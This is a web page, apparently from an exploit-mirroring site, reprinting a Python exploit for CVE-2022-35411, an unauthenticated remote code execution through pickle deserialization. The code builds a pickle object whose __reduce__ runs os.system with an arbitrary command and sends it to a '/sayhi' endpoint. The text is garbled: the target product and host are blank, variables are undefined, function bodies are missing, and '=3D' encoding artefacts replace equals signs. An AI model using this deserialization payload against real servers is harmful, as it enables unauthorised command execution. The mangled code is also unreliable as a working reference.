Advertisement 0.6.0 Remote Code Execution

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at:

Below is a copy: 0.6.0 Remote Code Execution
# Exploit Title: 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage:
# Software Link:
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411

import requests
import pickle

# Unauthenticated RCE 0-day for

HOST =3D ""

URL =3D f"http://{HOST}/sayhi"

    "serializer": "pickle"

def generate_payload(cmd):

    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload =3D pickle.dumps(PickleRce())


    return payload

def exec_command(cmd):

    payload =3D generate_payload(cmd), data=3Dpayload, headers=3DHEADERS)

def main():
    # exec_command('uname -a')

if __name__ =3D=3D "__main__":

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.